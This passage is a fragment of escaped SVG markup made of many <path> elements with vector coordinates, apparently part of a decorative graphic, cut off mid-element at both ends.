d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n        <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n        <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n        <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n        <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n        <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n        <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n        <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n        <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n        <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n        <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n        <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n        <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n        <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n        <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n        <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n        <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n        <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n        <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n        <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n        <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n        <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n        <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n        <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n        <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n        <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n        <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n        <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n        <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n        <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n        <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n        <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n        <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n        <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n        <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n        <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n        <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n        <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n        <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n        <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n        <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n        <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n        <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n        <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n        <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n        <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n        <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n        <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n        <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n        <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n        <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n        <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n        <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n        <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n        <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n        <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n        <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n        <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n        <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n        <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n        <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n        <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n        <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n        <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n        <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n        <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n        <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n        <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n        <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n        <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n        <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n        <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n        <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n        <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n        <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n        <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n        <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n        <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n        <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n        <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n        <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n        <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n        <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n        <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n        <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n        <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n        <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n        <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n        <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n        <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n        <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n        <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n        <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n        <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n        <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n        <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n        <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n        <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n        <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n        <path 